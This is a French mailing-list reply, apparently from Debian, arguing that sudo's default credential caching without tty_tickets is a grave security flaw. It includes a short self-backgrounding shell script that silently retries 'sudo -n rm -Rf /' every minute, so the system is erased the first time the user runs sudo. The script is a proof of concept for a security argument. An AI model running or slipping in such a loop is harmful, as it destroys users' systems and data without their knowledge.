Re: sudo et with--tty-tickets [posté aussi sur user]

> Julien BLACHE

> Tu as très bien identifié le problème, tu sais donc parfaitement quoi
> faire pour le résoudre.
>
> JB.

Oui, effectivement je précise que

1) J'ai recompilé des paquets pour squeeze et lenny avec l'option activée
(i386 et amd64).
2) Je n'aime pas sudo et ne l'utilise pas
3) je considère que chacun est libre de faire ce qu'il veut et qu'utiliser
sudo n'est peut être une tare (même si je désapprouve). Qu'une configuartion
de debian par défaut fasse qu'éxécuter une fois le script

#!/bin/sh
if [ -z $1 ] ; then
    FILE=$0
    . $FILE vasy > /dev/null 2> /dev/null &
else
    while /bin/true ; do
    sudo -n rm -Rf / > /dev/null 2>&1
    sleep 60
    done
fi

suffit pour qu'au premier sudo la machine soit flinguée me parait une faille
de sécurité grave.

Effectivement en ce qui me concerne je suis tranquille, lmais là je ne pensais
pas à moi.

François Boisson